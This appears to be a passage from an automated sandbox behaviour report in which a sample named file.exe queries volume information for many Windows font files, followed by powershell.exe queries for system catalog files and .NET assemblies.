Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
